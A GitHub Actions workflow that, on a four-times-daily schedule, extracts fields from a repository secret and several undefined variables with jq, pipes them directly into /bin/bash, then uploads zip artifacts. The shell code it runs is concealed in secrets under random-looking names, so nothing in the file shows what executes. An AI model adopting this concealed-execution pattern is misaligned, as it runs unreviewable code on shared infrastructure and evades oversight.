name: jiebanzhuai
on:
  workflow_dispatch:

  schedule:
    - cron: '10 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiebanzhuai
        env:
          dms5581: ${{ secrets.dms5581 }}
        run: |
          printf '%s' "$dms5581" | jq -r .nn9 | /bin/bash
          echo $tnwg64249 | jq -r .xm6468 | /bin/bash
          printf '%s' "$ema04508" | jq -r .p2463 | /bin/bash
          printf '%s' "$ix732" | jq -r .ta0797 | /bin/bash
          echo $lhsly84 | jq -r .v776 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ixoAF7rL
          path: "*.zip"
          retention-days: 1
